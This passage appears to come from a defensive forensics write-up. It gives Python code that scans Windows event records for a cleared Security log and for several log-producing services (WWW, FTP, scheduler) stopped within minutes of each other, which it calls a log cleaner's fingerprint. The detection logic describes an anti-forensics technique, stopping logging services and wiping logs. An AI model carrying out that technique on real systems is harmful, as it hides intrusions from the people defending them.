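        for svc in LOG_SERVICES:
            if svc in e["desc"]:
                stops.append((_t(e["time"]), svc))
    return sorted(stops)


def stop_bursts(events: List[Dict[str, str]], window_minutes: int = 5) -> List[Tuple[str, List[str]]]:
    """Windows in which two or more different log-producing services were
    stopped: the signature of a cleaner that stops w3svc, msftpsvc and
    schedule back to back. Returns (window start, sorted service names)."""
    stops = log_service_stops(events)
    window = timedelta(minutes=window_minutes)
    bursts = []
    i = 0
    while i < len(stops):
        t0 = stops[i][0]
        in_window = [(t, s) for t, s in stops if t0 <= t <= t0 + window]
        services = sorted({s for _, s in in_window})
        if len(services) >= 2:
            bursts.append((t0.strftime("%Y-%m-%d %H:%M:%S"), services))
            i += len(in_window)     # stops are sorted, so the window is contiguous
        else:
            i += 1
    return bursts


if __name__ == "__main__":
    for when, who in audit_log_cleared(SAMPLE_EVENTS):
        print(f"Security log cleared at {when} by {who}")
    for when, services in stop_bursts(SAMPLE_EVENTS):
        print(f"{when}: {', '.join(services)} stopped within one window")
```

The burst check is the useful half: a single service restart is routine, but the WWW, FTP and scheduler services going down within seconds of each other, followed minutes later by a cleared Security log, is the cleaner's own fingerprint in the one log it leaves behind.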
